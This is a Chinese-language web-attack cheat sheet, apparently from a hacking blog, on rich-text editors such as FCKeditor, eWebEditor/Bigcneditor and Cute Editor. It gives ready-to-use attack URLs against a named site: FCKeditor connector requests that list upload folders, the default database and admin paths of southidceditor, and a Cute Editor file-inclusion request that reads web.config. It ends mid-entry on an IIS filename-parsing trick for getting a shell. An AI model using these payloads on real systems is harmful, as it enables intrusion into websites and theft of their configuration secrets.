FCKeditorFCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页FCKeditor/_samples/default.html

查看编辑器版本FCKeditor/_whatsnew.html

查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径

Note:[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6[Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言

FCKeditor被动限制策略所导致的过滤不严问题影响版本: FCKeditor x.x http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdbhttp://www.heimian.com/admin/southidceditor/admin/admin_login.asphttp://www.heimian.com/admin/southidceditor/popup.aspbigcneditor(eWeb 2.7.5 VIP核心)其实所谓的Bigcneditor就是eWebEditor 2.7.5的VIP用户版.之所以无法访问admin_login.asp，提示“权限不够”4字真言，估计就是因为其授权“Licensed”问题,或许只允许被授权的机器访问后台才对。或许上面针对eWebEditor v2.8以下低版本的小动作可以用到这上面来.貌似没多少动作?——————————————————————————–Cute EditorCute Editor在线编辑器本地包含漏洞影响版本:CuteEditor For Net 6.4脆弱描述：可以随意查看网站文件内容，危害较大。攻击利用:http://www.heimian.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=http://www.cnblogs.com/../web.config——————————————————————————–Webhtmleditor利用WIN 2003 IIS文件名称解析漏洞获得SHELL影响版本：